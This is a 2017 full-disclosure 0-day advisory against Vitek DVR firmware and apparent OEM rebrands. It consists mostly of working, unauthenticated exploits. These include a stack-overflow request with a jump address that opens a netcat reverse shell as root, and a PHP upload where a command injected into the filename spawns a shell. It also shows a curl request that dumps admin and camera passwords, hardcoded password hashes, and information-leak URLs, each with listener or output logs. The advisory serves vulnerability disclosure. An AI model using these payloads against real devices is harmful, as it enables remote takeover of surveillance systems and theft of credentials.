[STX]
Subject: Vitek RCE and Information Disclosure (and possible other OEM)
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (December 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 22, 2017
Full Disclosure: 0-day
heap: Executable + Non-ASLR
stack: Executable + ASLR
-[Manufacture Logo]-
_ _ _ _ _ _ _ _ _ _ _ _
\ _ _ _ _ _ ___
/ /__/ \ |_/
/ __ / - _ ___
/ / / / / /
_ _ _ _/ / / \_/ \_ ______
___________\___\__________________
-[OEM (found in the code)]-
Vitek (http://www.vitekcctv.com/) - Verified: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
Thrive
Wisecon
Sanyo
Inodic
CBC
Elbex
Y3K
KTNC
-[Stack Overflow RCE]-
[Reverse netcat shell]
$ echo -en "GET /dvrcontrol.cgi?nc\x24\x7bIFS\x7d192.168.57.1\x24\x7bIFS\x7d31337\x24\x7bIFS\x7d-e\x24\x7bIFS\x7dsh\x24\x7bIFS\x7d HTTP/1.0\r\nAuthorization Pwned: `for((i=0;i<272;i++)); do echo -en "A";done`\x80\x9a\x73\x02\xc8\x4a\x11\x20\r\n\r\n"|ncat 192.168.57.20 81
[Listener]
$ ncat -vlp 31337
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: E672 0A5B B852 8EF9 36D0 E979 2827 1FAD 7482 8A7B
Ncat: Listening on :::31337
Ncat: Listening on 0.0.0.0:31337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:36356.
pwd
/opt/fw
whoami
root
exit
$
Note:
1. Badbytes: 0x00,0x09,0x0a,0x0b,0x0c,0x0d,0x20
2. 0x20 will be replaced with 0x00 by the H4/H1/N1 binary, use this to jump binary included system() address: 0x00114AC8 [system() call in H4]
3. 0x02739A0C + 0x74 = $r11 address we need (0x2739A80) to point our CMD string on heap for system() in $r0
H1:
VT-HDOC4E_Firmware_1.21A_UI_1.1.C.6
.rodata:005292E8 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:001CD138 SUB R3, R11, #0x74
.text:001CD13C MOV R0, R3
.text:001CD140 BL system
H4:
VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
.rodata:00B945A0 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:00114AC8 SUB R3, R11, #0x74
.text:00114ACC MOV R0, R3
.text:00114AD0 BL system
N1:
VT-HDOC8E_Firmware_1.21E_UI_1.1.C.6
.rodata:004A4AC4 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:001E9F0C SUB R3, R11, #0x74
.text:001E9F10 MOV R0, R3
.text:001E9F14 BL system
-[PHP RCE]-
Note: /mnt/usb2 must be mounted and R/W... (normally R/O w/o USB stick inserted)
[Reverse netcat shell (forking)]
$ curl -v 'http://192.168.57.20:80/cgi-bin/php/htdocs/system/upload_check.php' -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1337" -d "`echo -en "\r\n\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n100000000\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"\|\|nc\$\{IFS\}\$\{REMOTE_ADDR\}\$\{IFS\}31337\$\{IFS\}-e\$\{IFS\}sh\$\{IFS\}\&\$\{IFS\}\|\|\"\r\nContent-Type: application/gzip\r\n\r\nPWNED\r\n\r\n------WebKitFormBoundary1337--\r\n\r\n"`" -X POST
200 OK
[...]
> ERROR : Current_fw_info File Open Error<br>> ERROR : dvr_upgrade File Open Error<br>F/W File(||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||) Upload Completed.<br>If you want to upgrade please click START button<br><br><form enctype="multipart/form-data" action="fw_update.php" method="post"><input type="hidden" name="PHPSESSID" value="67eaa14441089e5d2e7fe6ff0fa88d42" /><input type="submit" value="START"></form> </tbody>
[...]
[Listener]
$ ncat -vlp 31337
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 76D3 7FA3 396A B9F6 CCA6 CEA5 2EF8 06DF FF72 79EF
Ncat: Listening on :::31337
Ncat: Listening on 0.0.0.0:31337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:52726.
pwd
/opt/www/htdocs/system
whoami
nobody
ls -l /mnt/usb2/
total 4
drwxrwxrwx 2 nobody nobody 0 Dec 16 02:55 dvr
-rw------- 1 nobody nobody 7 Dec 16 02:55 ||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||
exit
$
-[Login / Password Disclosure]-
curl -v "http://192.168.57.20:80/menu.env" | hexdump -C
[binary config, login and password can be found for admin login and all connected cameras]
Admin l/p
[...]
00001380 00 00 00 00 01 01 00 01 01 01 01 00 00 00 00 00 |................|
00001390 00 00 00 00 00 41 44 4d 49 4e 00 00 00 00 00 00 |.....ADMIN......|
000013a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00001400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 32 |..............12|
00001410 33 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |34..............|
00001420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
Cameras l/p
[...]
00008d80 00 00 00 00 c0 00 a8 00 01 00 15 00 92 1f 00 00 |................|
00008d90 91 1f 00 00 72 6f 6f 74 00 00 00 00 00 00 00 00 |....root........|
00008da0 00 00 00 00 70 61 73 73 00 00 00 00 00 00 00 00 |....pass........|
00008db0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00008dc0 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 a8 00 |................|
00008dd0 01 00 16 00 94 1f 00 00 93 1f 00 00 72 6f 6f 74 |............root|
00008de0 00 00 00 00 00 00 00 00 00 00 00 00 70 61 73 73 |............pass|
00008df0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
-[Hardcode l/p]-
FTP: TCP/10021
TELNET: TCP/10023
/etc/passwd
root:$1$5LFGqGq.$fUozHRdzvapI2qBf1EeoJ0:0:0:root:/root:/bin/sh
woody:$1$e0vY7A0V$BjS38SsHNWC5DxEGlzuEP1:1001:100:woohyun digital user:/home/woody:/bin/sh
-[Korean hardcoded DNS]-
$ cat /etc/resolv.conf
nameserver 168.126.63.1
nameserver 0.0.0.0
nameserver 0.0.0.0
$
$ nslookup 168.126.63.1
1.63.126.168.in-addr.arpa name = kns.kornet.net.
$ nslookup 168.126.63.2
2.63.126.168.in-addr.arpa name = kns2.kornet.net.
-[Other Information Disclosure]-
curl -v "http://192.168.57.20:80/webviewer/netinfo.dat"
192,168,57,20
192,168,2,100
00:0A:2F:XX:XX:XX
00:0A:2F:YY:YY:YY
255.255.255.0
192.168.57.1
-[MAC Address Details]-
Company: Artnix Inc.
Address: Seoul 137-819, KOREA, REPUBLIC OF
Range: 00:0A:2F:00:00:00 - 00:0A:2F:FF:FF:FF
Type: IEEE MA-L
curl -v "http://192.168.57.20:80/webviewer/gw.dat"
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.2.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1
192.168.57.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
0.0.0.0 192.168.57.1 0.0.0.0 UG 0 0 0 eth0
curl -v "http://192.168.57.20:80/cgi-bin/php/lang_change.php?lang=0"
Change GUI Language to English
[... and more]
[ETX]